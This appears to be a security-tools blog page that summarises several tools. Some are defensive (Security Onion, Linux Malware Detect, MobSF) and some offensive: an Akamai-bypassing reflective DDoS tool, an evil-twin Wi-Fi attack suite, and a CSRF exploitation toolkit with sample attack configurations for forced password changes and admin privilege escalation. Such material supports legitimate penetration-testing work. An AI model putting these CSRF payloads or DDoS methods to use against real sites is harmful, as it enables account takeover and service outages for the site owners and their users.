Security Onion - Linux Distro For Intrusion Detection, Network Security Monitoring, And Log Management

Security Onion is a Linux distro for intrusion detection, network security monitoring, and log management. It's based on Ubuntu and contains Snort, Suricata, Bro, OSSEC, Sguil, Squert, ELSA, Xplico, NetworkMiner, and many other security tools. The easy-to-use Setup wizard allows you to build an army of distributed sensors for your enterprise in minutes!

Easy-to-use Setup wizard allows you to build an army of distributed sensors for your enterprise in minutes


Analyze your NIDS/HIDS alerts with Squert


Pivot between multiple data types with Sguil and send pcaps to Wireshark and NetworkMiner


Use ELSA to slice and dice your logs


Access full packet capture with CapMe


Snort/Suricata and Bro compiled with PF_RING to handle lots of traffic


Easy updates

Data Types

• Alert data - HIDS alerts from OSSEC and NIDS alerts from Snort/Suricata
• Asset data from Prads and Bro
• Full content data from netsniff-ng
• Host data via OSSEC and syslog-ng
• Session data from Argus, Prads, and Bro
• Transaction data - http/ftp/dns/ssl/other logs from Bro

Download Security Onion

Read More

ARDT - Akamai Reflective DDoS Tool

Akamai Reflective DDoS Tool

Attack the origin host behind the Akamai Edge hosts and bypass the DDoS protection offered by Akamai services.

How it works...

Based off the research done at NCC: ( https://dl.packetstormsecurity.net/papers/attack/the_pentesters_guide_to_akamai.pdf )

Akamai boast around 100,000 edge nodes around the world which offer load balancing, web application firewall, caching etc, to ensure that a minimal amount of requests actually hit your origin web-server beign protected. However, the issue with caching is that you cannot cache something that is non-deterministic, I.E a search result. A search that has not been requested before is likely not in the cache, and will result in a Cache-Miss, and the Akamai edge node requesting the resource from the origin server itself.

What this tool does is, provided a list of Akamai edge nodes and a valid cache missing request, produces multiple requests that hit the origin server via the Akamai edge nodes. As you can imagine, if you had 50 IP addresses under your control, sending requests at around 20 per second, with 100,000 Akamai edge node list, and a request which resulting in 10KB hitting the origin, if my calculations are correct, thats around 976MB/ps hitting the origin server, which is a hell of a lot of traffic.

Finding Akamai Edge Nodes

To find Akamai Edge Nodes, the following script has been included:

# python ARDT_Akamai_EdgeNode_Finder.py

This can be edited quite easily to find more, it then saves the IPS automatically.

Download ARDT

Read More

Infernal-Twin - This Is Evil Twin Attack Automated (Wireless Hacking)

This tool is created to aid the penetration testers in assessing wireless security. Author is not responsible for misuse. Please read instructions thoroughly.

Usage

sudo python InfernalWireless.py

How to install

$ sudo apt-get install apache2
$ sudo apt-get install mysql-server libapache2-mod-auth-mysql php5-mysql

$ sudo apt-get install python-scapy 
$ sudo apt-get install python-wxtools
$ sudo apt-get install python-mysqldb

$ sudo apt-get install aircrack-ng

$ git clone https://github.com/entropy1337/infernal-twin.git
$ cd infernal-twin


$ python db_connect_creds.py 
dbconnect.conf doesn't exists or creds are incorrect
*************** creating DB config file ************
Enter the DB username: root
Enter the password: *************
trying to connect
username root

FAQ:

I have a problem with connecting to the Database
Solution:
(Thanks to @lightos for this fix)
There seem to be few issues with Database connectivity. The solution is to create a new user on the database and use that user for launching the tool. Follow the following steps.

1. Delete dbconnect.conf file from the Infernalwireless folder
   
2. Run the following command from your mysql console.
   mysql> use mysql;
   mysql> CREATE USER 'root2'@'localhost' IDENTIFIED BY 'enter the new password here';
   mysql> GRANT ALL PRIVILEGES ON \*.\* TO 'root2'@'localhost' WITH GRANT OPTION;
   
3. Try to run the tool again.
   

Release Notes:

New Features:

• GUI Wireless security assessment SUIT
  
• Impelemented
  
• WPA2 hacking
  
• WEP Hacking
  
• WPA2 Enterprise hacking
  
• Wireless Social Engineering
  
• SSL Strip
  
• Report generation
  
• PDF Report
  
• HTML Report
  
• Note taking function
  
• Data is saved into Database
  
• Network mapping
  
• MiTM
  
• Probe Request
  

Changes:

• Improved compatibility
  
• Report improvement
  
• Better NAT Rules
  

Bug Fixes:

• Wireless Evil Access Point traffic redirect
• Fixed WPA2 Cracking
• Fixed Infernal Wireless
• Fixed Free AP
• Check for requirements
• DB implementation via config file
• Improved Catch and error
• Check for requirements
• Works with Kali 2

Coming Soon:

• Parsing t-shark log files for gathering creds and more
  
• More attacks.
  

Expected bugs:

• Wireless card might not be supported
  
• Windodw might crash
  
• Freeze
  
• A lot of work to be done, but this tool is still being developed.
  

Download Infernal-Twin

Read More

LMD - Linux Malware Detect

Linux Malware Detect (LMD) is a malware scanner for Linux released under the GNU GPLv2 license, that is designed around the threats faced in shared hosted environments. It uses threat data from network edge intrusion detection systems to extract malware that is actively being used in attacks and generates signatures for detection. In addition, threat data is also derived from user submissions with the LMD checkout feature and from malware community resources. The signatures that LMD uses are MD5 file hashes and HEX pattern matches, they are also easily exported to any number of detection tools such as ClamAV.

The driving force behind LMD is that there is currently limited availability of open source/restriction free tools for Linux systems that focus on malware detection and more important that get it right. Many of the AV products that perform malware detection on Linux have a very poor track record of detecting threats, especially those targeted at shared hosted environments.

The threat landscape in shared hosted environments is unique from that of the standard AV products detection suite in that they are detecting primarily OS level trojans, rootkits and traditional file-infecting viruses but missing the ever increasing variety of malware on the user account level which serves as an attack platform.

The commercial products available for malware detection and remediation in multi-user shared environments remains abysmal. An analysis of 8,883 malware hashes, detected by LMD 1.5, against 30 commercial anti-virus and malware products paints a picture of how poorly commercial solutions perform.

DETECTED KNOWN MALWARE: 1951
% AV DETECT (AVG): 58
% AV DETECT (LOW): 10
% AV DETECT (HIGH): 100
UNKNOWN MALWARE: 6931

Using the Team Cymru malware hash registry, we can see that of the 8,883 malware hashes shipping with LMD 1.5, there was 6,931 or 78% of threats that went undetected by 30 commercial anti-virus and malware products. The 1,951 threats that were detected had an average detection rate of 58% with a low and high detection rate of 10% and 100% respectively. There could not be a clearer statement to the need for an open and community driven malware remediation project that focuses on the threat landscape of multi-user shared environments.

Features:

• MD5 file hash detection for quick threat identification
• HEX based pattern matching for identifying threat variants
• statistical analysis component for detection of obfuscated threats (e.g: base64)
• integrated detection of ClamAV to use as scanner engine for improved performance
• integrated signature update feature with -u|–update
• integrated version update feature with -d|–update-ver
• scan-recent option to scan only files that have been added/changed in X days
• scan-all option for full path based scanning
• checkout option to upload suspected malware to rfxn.com for review / hashing
• full reporting system to view current and previous scan results
• quarantine queue that stores threats in a safe fashion with no permissions
• quarantine batching option to quarantine the results of a current or past scans
• quarantine restore option to restore files to original path, owner and perms
• quarantine suspend account option to Cpanel suspend or shell revoke users
• cleaner rules to attempt removal of malware injected strings
• cleaner batching option to attempt cleaning of previous scan reports
• cleaner rules to remove base64 and gzinflate(base64 injected malware
• daily cron based scanning of all changes in last 24h in user homedirs
• daily cron script compatible with stock RH style systems, Cpanel & Ensim
• kernel based inotify real time file scanning of created/modified/moved files
• kernel inotify monitor that can take path data from STDIN or FILE
• kernel inotify monitor convenience feature to monitor system users
• kernel inotify monitor can be restricted to a configurable user html root
• kernel inotify monitor with dynamic sysctl limits for optimal performance
• kernel inotify alerting through daily and/or optional weekly reports
• e-mail alert reporting after every scan execution (manual & daily)
• path, extension and signature based ignore options
• background scanner option for unattended scan operations
• verbose logging & output of all actions

Source Data:

The defining difference with LMD is that it doesn’t just detect malware based on signatures/hashes that someone else generated but rather it is an encompassing project that actively tracks in the wild threats and generates signatures based on those real world threats that are currently circulating.

There are four main sources for malware data that is used to generate LMD signatures:

– Network Edge IPS: Through networks managed as part of my day-to-day job, primarily web hosting related, our web servers receive a large amount of daily abuse events, all of which is logged by our network edge IPS. The IPS events are processed to extract malware url’s, decode POST payload and base64/gzip encoded abuse data and ultimately that malware is retrieved, reviewed, classified and then signatures generated as appropriate. The vast majority of LMD signatures have been derived from IPS extracted data.

– Community Data: Data is aggregated from multiple community malware websites such as clean-mx and malwaredomainlist then processed to retrieve new malware, review, classify and then generate signatures.

– ClamAV: The HEX & MD5 detection signatures from ClamAV are monitored for relevant updates that apply to the target user group of LMD and added to the project as appropriate. To date there has been roughly 400 signatures ported from ClamAV while the LMD project has contributed back to ClamAV by submitting over 1,100 signatures and continues to do so on an ongoing basis.

– User Submission: LMD has a checkout feature that allows users to submit suspected malware for review, this has grown into a very popular feature and generates on average about 30-50 submissions per week.

Signature Updates:

The LMD signature are updated typically once per day or more frequently depending on incoming threat data from the LMD checkout feature, IPS malware extraction and other sources. The updating of signatures in LMD installations is performed daily through the default cron.daily script with the –update option, which can be run manually at any time.

An RSS feed is available for tracking malware threat updates: http://www.rfxn.com/api/lmd

Detected Threats:

LMD 1.5 has a total of 10,822 (8,908 MD5 / 1,914) signatures, before any updates. The top 60 threats by prevalence detected by LMD are as follows:

base64.inject.unclassed     perl.ircbot.xscan
bin.dccserv.irsexxy         perl.mailer.yellsoft
bin.fakeproc.Xnuxer         perl.shell.cbLorD
bin.ircbot.nbot             perl.shell.cgitelnet
bin.ircbot.php3             php.cmdshell.c100
bin.ircbot.unclassed        php.cmdshell.c99
bin.pktflood.ABC123         php.cmdshell.cih
bin.pktflood.osf            php.cmdshell.egyspider
bin.trojan.linuxsmalli      php.cmdshell.fx29
c.ircbot.tsunami            php.cmdshell.ItsmYarD
exp.linux.rstb              php.cmdshell.Ketemu
exp.linux.unclassed         php.cmdshell.N3tshell
exp.setuid0.unclassed       php.cmdshell.r57
gzbase64.inject             php.cmdshell.unclassed
html.phishing.auc61         php.defash.buno
html.phishing.hsbc          php.exe.globals
perl.connback.DataCha0s     php.include.remote
perl.connback.N2            php.ircbot.InsideTeam
perl.cpanel.cpwrap          php.ircbot.lolwut
perl.ircbot.atrixteam       php.ircbot.sniper
perl.ircbot.bRuNo           php.ircbot.vj_denie
perl.ircbot.Clx             php.mailer.10hack
perl.ircbot.devil           php.mailer.bombam
perl.ircbot.fx29            php.mailer.PostMan
perl.ircbot.magnum          php.phishing.AliKay
perl.ircbot.oldwolf         php.phishing.mrbrain
perl.ircbot.putr4XtReme     php.phishing.ReZulT
perl.ircbot.rafflesia       php.pktflood.oey
perl.ircbot.UberCracker     php.shell.rc99
perl.ircbot.xdh             php.shell.shellcomm

Real-Time Monitoring:

The inotify monitoring feature is designed to monitor paths/users in real-time for file creation/modify/move operations. This option requires a kernel that supports inotify_watch (CONFIG_INOTIFY) which is found in kernels 2.6.13+ and CentOS/RHEL 5 by default. If you are running CentOS 4 you should consider an inbox upgrade with:

http://www.rfxn.com/upgrade-centos-4-8-to-5-3/

There are three modes that the monitor can be executed with and they relate to what will be monitored, they are USERS|PATHS|FILES.

       e.g: maldet --monitor users
       e.g: maldet --monitor /root/monitor_paths
       e.g: maldet --monitor /home/mike,/home/ashton

The options break down as follows:

USERS: The users option will take the homedirs of all system users that are above inotify_minuid and monitor them. If inotify_webdir is set then the users webdir, if it exists, will only be monitored.

PATHS: A comma spaced list of paths to monitor

FILE: A line spaced file list of paths to monitor

Once you start maldet in monitor mode, it will preprocess the paths based on the option specified followed by starting the inotify process. The starting of the inotify process can be a time consuming task as it needs to setup a monitor hook for every file under the monitored paths. Although the startup process can impact the load temporarily, once the process has started it maintains all of its resources inside kernel memory and has a very small userspace footprint in memory or cpu usage.

Download LMD

Read More

XPL-SEARCH - Search Exploits In Multiple Exploit Databases

XPL SEARCH

Search exploits in multiple exploit databases!
 Exploit databases available:
 * Exploit-DB
 * MIlw0rm
 * PacketStormSecurity
 * IntelligentExploit
 * IEDB
 * CVE

TO RUN THE SCRIPT

PHP Version (cli) 5.5.8 or higher
 php5-cli         Lib
cURL support      Enabled
 php5-curl        Lib
cURL Version      7.40.0 or higher
allow_url_fopen   On
Permission        Writing & Reading

ABOUT DEVELOPER

Author_Nick       CoderPIRATA
Author_Name       Eduardo
Email             coderpirata@gmail.com
Blog              http://coderpirata.blogspot.com.br/
Twitter           https://twitter.com/coderpirata
Google+           https://plus.google.com/103146866540699363823
Pastebin          http://pastebin.com/u/CoderPirata
Github            https://github.com/coderpirata/

"CHANGELOG"

0.1 - [02/07/2015]
- Started.

0.2 - [12/07/2015]
- Added Exploit-DB.
- Added Colors, only for linux!
- Added Update Function.
- "Generator" of User-Agent reworked.
- Small errors and adaptations.

0.3 - [22/07/2015]
- Bugs solved.
- Added "save" Function.
- Added "set-db" function.

0.4 - [05/08/2015]
- Save function modified.
- Added Scan with list.

0.5 - [29/08/2015]
- Added search by Author.

0.6 - [09/09/2015]
- Now displays the author of the exploit.
 * Does not work with IntelligentExploit.
- Changes in search logs.

0.7 - [11/09/2015]
- Added search in CVE.
 * ID.
 * Simple search - id 6.
- Bug in exploit-db search, "papers" fixed.
- Added standard time of 60 seconds for each request.
- file_get_contents() was removed from "browser()".
- Code of milw00rm search has been modified.
- Changes in search logs.
- Added date.

0.7.1 - [17/09/2015]
- Bug in milw00rm solved

0.8 - [05/10/2015]
- Added shebang.
- Commands "save", "save-log" and "save-dir" have been modified.
- Added "no-db" option.
- GETOPT() modified - Thanks Jack2.
- Bug on save-dir solved.
- Others minor bugs solved.

Screenshot

Download XPL-SEARCH

Read More

MobSF (Mobile Security Framework) - Mobile (Android/iOS) Automated Pen-Testing Framework

Mobile Security Framework (MobSF) is an intelligent, all-in-one open source mobile application (Android/iOS) automated pen-testing framework capable of performing static and dynamic analysis. We've been depending on multiple tools to carry out reversing, decoding, debugging, code review, and pen-test and this process requires a lot of effort and time. Mobile Security Framework can be used for effective and fast security analysis of Android and iOS Applications. It supports binaries (APK & IPA) and zipped source code.

The static analyzer is able to perform automated code review, detect insecure permissions and configurations, and detect insecure code like ssl overriding, ssl bypass, weak crypto, obfuscated codes, improper permissions, hardcoded secrets, improper usage of dangerous APIs, leakage of sensitive/PII information, and insecure file storage. The dynamic analyzer runs the application in a VM or on a configured device and detects the issues at run time. Further analysis is done on the captured network packets, decrypted HTTPS traffic, application dumps, logs, error or crash reports, debug information, stack trace, and on the application assets like setting files, preferences, and databases. This framework is highly scalable that you can add your custom rules with ease. A quick and clean report can be generated at the end of the tests. We will be extending this framework to support other mobile platforms like Tizen, WindowsPhone etc. in future.

Documentation

• https://github.com/ajinabraham/Mobile-Security-Framework-MobSF/wiki/Documentation

Queries

• Features Requests: @ajinabraham or @OpenSecurity_IN .
• Open Bugs Here: https://github.com/ajinabraham/YSO-Mobile-Security-Framework/issues

Screenshots and Sample Report

Static Analysis - Android APK

Static Analysis - iOS IPA

Sample Report: http://opensecurity.in/research/security-analysis-of-android-browsers.html

v0.8.8 Changelog

• New name: Mobile Security Framework (MobSF)
• Added Dynamic Analysis
• VM Available for Download
• Fixed RCE
• Fixed Broken Manifest File Parsing Logic
• Sqlite DB Support
• Fixed Reporting with new PDF report
• Rescan Option
• Detect Root Detection
• Added Requiremnts.txt
• Automated Java Path Detection
• Improved Manifest and Code Analysis
• Fixed Unzipping error for Unix.
• Activity Tester Module
• Exported Activity Tester Module
• Device API Hooker with DroidMon
• SSL Certificate Pinning Bypass with JustTrustMe
• RootCloak to prevent root Detection
• Data Pusher to Dump Application Data
• pyWebproxy to decrypt SSL Traffic

v0.8.7 Changelog

• Improved Static Analysis Rules
• Better AndroidManifest View
• Search in Files

v0.8.6 Changelog

• Detects implicitly exported component from manifest.
• Added CFR decompiler support
• Fixed Regex DoS on URL Regex

v0.8.5 Changelog

• Bug Fix to support IPA MIME Type: application/x-itunes-ipa

v0.8.4 Changelog

• Improved Android Static Code Analysis speed (2X performance)
• Static Code analysis on Dexguard protected APK.
• Fixed a Security Issue - Email Regex DoS.
• Added Logging Code.
• All Browser Support.
• MIME Type Bug fix to Support IE.
• Fixed Progress Bar.

v0.8.3 Changelog

• View AndroidManifest.xml & Info.plist
• Supports iOS Binary (IPA)
• Bug Fix for Linux (Ubuntu), missing MIME Type Detection
• Check for Hardcoded Certificates
• Added Code to prevent from Directory Traversal

Credits

• Bharadwaj Machiraju (@tunnelshade_) - For writing pyWebProxy from scratch
• Thomas Abraham - For JS Hacks on UI.
• Anto Joseph (@antojosep007) - For the help with SuperSU.
• Tim Brown (@timb_machine) - For the iOS Binary Analysis Ruleset.
• Abhinav Sejpal (@Abhinav_Sejpal) - For poking me with bugs and feature requests.
• Anant Srivastava (@anantshri) - For Activity Tester Idea

Download Mobile-Security-Framework-Mobsf

Read More

Gping - Ping, But With A Graph

Ping, but with a graph

Install and run
Created/tested with Python 3.4, should run on 2.7 (will require the statistics module though).

pip3 install pinggraph

Tested on Windows and Ubuntu, should run on OS X as well. After installation just run:

gping [yourhost]

If you don't give a host then it pings google.

Why?
My apartments internet is all 4g, and while it's normally pretty fast it can be a bit flakey. I often found myself running ping -t google.com in a command window to get a rough idea of the network speed, and I thought a graph would be a great way to visualize the data. I still wanted to just use the command line though, so I decided to try and write a cross platform one that I could use. And here we are.

Code
For a quick hack the code started off really nice, but after I decided pretty colors were a good addition it quickly got rather complicated. Inside pinger.py is a function plot() , this uses a canvas-like object to "draw" things like lines and boxes to the screen. I found on Windows that changing the colors is slow and caused the screen to flicker, so theres a big mess of a function called process_colors to try and optimize that. Don't ask.

Download Gping

Read More

CSRFT - Cross Site Request Forgeries (Exploitation) Toolkit

This project has been developed to exploit CSRF Web vulnerabilities and provide you a quick and easy exploitation toolkit. In few words, this is a simple HTTP Server in NodeJS that will communicate with the clients (victims) and send them payload that will be executed using JavaScript.

This has been developed entirely in NodeJS, and configuration files are in JSON format.

* However, there's a tool in Python in utils folder that you can use to automate CSRF exploitation. *

This project allows you to perform PoC (Proof Of Concepts) really easily. Let's see how to get/use it.

How to get/use the tool
First, clone it :

$ git clone git@github.com:PaulSec/CSRFT.git

To make this project work, get the latest Node.js version here . Go in the directory and install all the dependencies:

npm install

Then, launch the server.js :

$ node server.js

Usage will be displayed :

Usage : node server.js <file.json> <port : default 8080>

More information
By default, the server will be launched on the port 8080, so you can access it via : http://0.0.0.0:8080 .
The JSON file must describe your several attack scenarios. It can be wherever you want on your hard drive.
The index page displayed on the browser is accessible via : /views/index.ejs .
You can change it as you want and give the link to your victim.

Different folders : What do they mean ?
The idea is to provide a 'basic' hierarchy (of the folders) for your projects. I made the script quite modular so your configuration files/malicious forms, etc. don't have to be in those folders though. This is more like a good practice/advice for your future projects.

However, here is a little summary of those folders :

• conf folder : add your JSON configuration file with your configuration.
  
• exploits folder : add all your *.html files containing your forms
• public folder : containing jquery.js and inject.js (script loaded when accessing 0.0.0.0:8080)
• views folder : index file and exploit template
• dicos : Folder containing all your dictionnaries for those attacks
• lib : libs specific for my project (custom ones)
• utils : folder containing utils such as : csrft_utils.py which will launch CSRFT directly.
• server.js file - the HTTP server

Configuration file templates

GET Request with special value
Here is a basic example of JSON configuration file that will target www.vulnerable.com This is a special value because the malicious payload is already in the URL/form.

{
  "audit": {
    "name": "PoC done with Automatic Tool", 
    "scenario": [
      {
        "attack": [
          {
            "method": "GET", 
            "type_attack": "special_value", 
            "url": "http://www.vulnerable.com/changePassword.php?newPassword=csrfAttacks"
          }
        ]
      }
    ]
  }
}

GET Request with dictionnary attack
Here is a basic example of JSON configuration file. For every entry in the dictionnary file, there will be a HTTP Request done.

{
  "audit": {
    "name": "PoC done with Automatic Tool", 
    "scenario": [
      {
        "attack": [
          {
            "file": "./dicos/passwords.txt", 
            "method": "GET", 
            "type_attack": "dico", 
            "url": "http://www.vulnerable.com/changePassword.php?newPassword=<%value%>"
          }
        ]
      }
    ]
  }
}

POST Request with special value attack

{
  "audit": {
    "name": "PoC done with Automatic Tool", 
    "scenario": [
      {
        "attack": [
          {
            "form": "/tmp/csrft/form.html", 
            "method": "POST", 
            "type_attack": "special_value"
          }
        ]
      }
    ]
  }
}

The form already includes the malicious payload. So it just has to be executed by the victim.
I hope you understood the principles. I didn't write an example for a POST with dictionnary attack because there will be one in the next section.

Ok but what do Scenario and Attack mean ?
A scenario is composed of attacks. Those attacks can be simultaneous or at different time.
For example, you want to sign the user in and THEN , you want him to perform some unwanted actions. You can specify it in the JSON file.
Let's take an example with both POST and GET Request :

{
    "audit": {
        "name": "DeepSec | Login the admin, give privilege to the Hacker and log him out",

        "scenario": [
            {
                "attack": [
                    {
                        "method": "POST",
                        "type_attack": "dico",
                        "file": "passwords.txt",
                        "form": "deepsec_form_log_user.html",
                        "comment": "attempt to connect the admin with a list of selected passwords"
                    }
                ]
            },
            {
                "attack": [
                    {
                        "method": "GET",
                        "type_attack": "special_value",
                        "url": "http://192.168.56.1/vuln-website/index.php/welcome/upgrade/27",
                        "comment": "then, after the login session, we expect the admin to be logged in, attempt to upgrade our account"
                    }
                ]
            },          
            {
                "attack": [
                    {
                        "method": "GET",
                        "type_attack": "special_value",
                        "url": "http://192.168.56.1/vuln-website/index.php/welcome/logout",
                        "comment": "The final step is to logout the admin"
                    }
                ] 
            }   
        ]
    }
}

You can now define some "steps", different attacks that will be executed in a certain order.

Use cases

A) I want to write my specific JSON configuration file and launch it by hand
Based on the templates which are available, you can easily create your own. If you have any trouble creating it, feel free to contact me and I'll try to help you as much as I can but it shoudn't be this complicated.
Steps to succeed :
1) Create your configuration file, see samples in conf/ folder
2) Add your .html files in the exploits/ folder with the different payloads if the CSRF is POST vulnerable
3) If you want to do Dictionnary attack, add your dictionnary file to the dicos/ folder,
4) Replace the value of the field you want to perform this attack with the token <%value%>
=> either in your urls if GET exploitation, or in the HTML files if POST exploitation.
5) Launch the application : node server.js conf/test.json


B) I want to automate attacks really easily
To do so, I developed a Python script csrft_utils.py in utils folder that will do this for you.
Here are some basic use cases :
* GET parameter with Dictionnary attack : *

$ python csrft_utils.py --url="http://www.vulnerable.com/changePassword.php?newPassword=csvulnerableParameter" --param=newPassword --dico_file="../dicos/passwords.txt"

* POST parameter with Special value attack : *

$ python csrft_utils.py --form=http://website.com/user.php --id=changePassword --param=password password=newPassword --special_value

Download CSRFT

Read More

Burpkit - Next-Gen Burpsuite Penetration Testing Tool

Welcome to the next generation of web application penetration testing - using WebKit to own the web. BurpKit is a BurpSuite plugin which helps in assessing complex web apps that render the contents of their pages dynamically. It also provides a bi-directional JavaScript bridge API which allows users to create quick one-off BurpSuite plugin prototypes which can interact directly with the DOM and Burp's extender API.

System Requirements
BurpKit has the following system requirements:

• Oracle JDK >=8u50 and <9 ( Download )
• At least 4GB of RAM

Installation
Installing BurpKit is simple:

1. Download the latest prebuilt release from the GitHub releases page .
2. Open BurpSuite and navigate to the Extender tab.
3. Under Burp Extensions click the Add button.
4. In the Load Burp Extension dialog, make sure that Extension Type is set to Java and click the Select file ... button under Extension Details .
5. Select the BurpKit-<version>.jar file and click Next when done.

If all goes well, you will see three additional top-level tabs appear in BurpSuite:

1. BurpKitty : a courtesy browser for navigating the web within BurpSuite.
2. BurpScript IDE : a lightweight integrated development environment for writing JavaScript-based BurpSuite plugins and other things.
3. Jython : an integrated python interpreter console and lightweight script text editor.

BurpScript
BurpScript enables users to write desktop-based JavaScript applications as well as BurpSuite extensions using the JavaScript scripting language. This is achieved by injecting two new objects by default into the DOM on page load:

1. burpKit : provides numerous features including file system I/O support and easy JS library injection.
2. burpCallbacks : the JavaScript equivalent of the IBurpExtenderCallbacks interface in Java with a few slight modifications.

Take a look at the examples folder for more information.

More Information?
A readable version of the docs can be found at here

Download Burpkit

Read More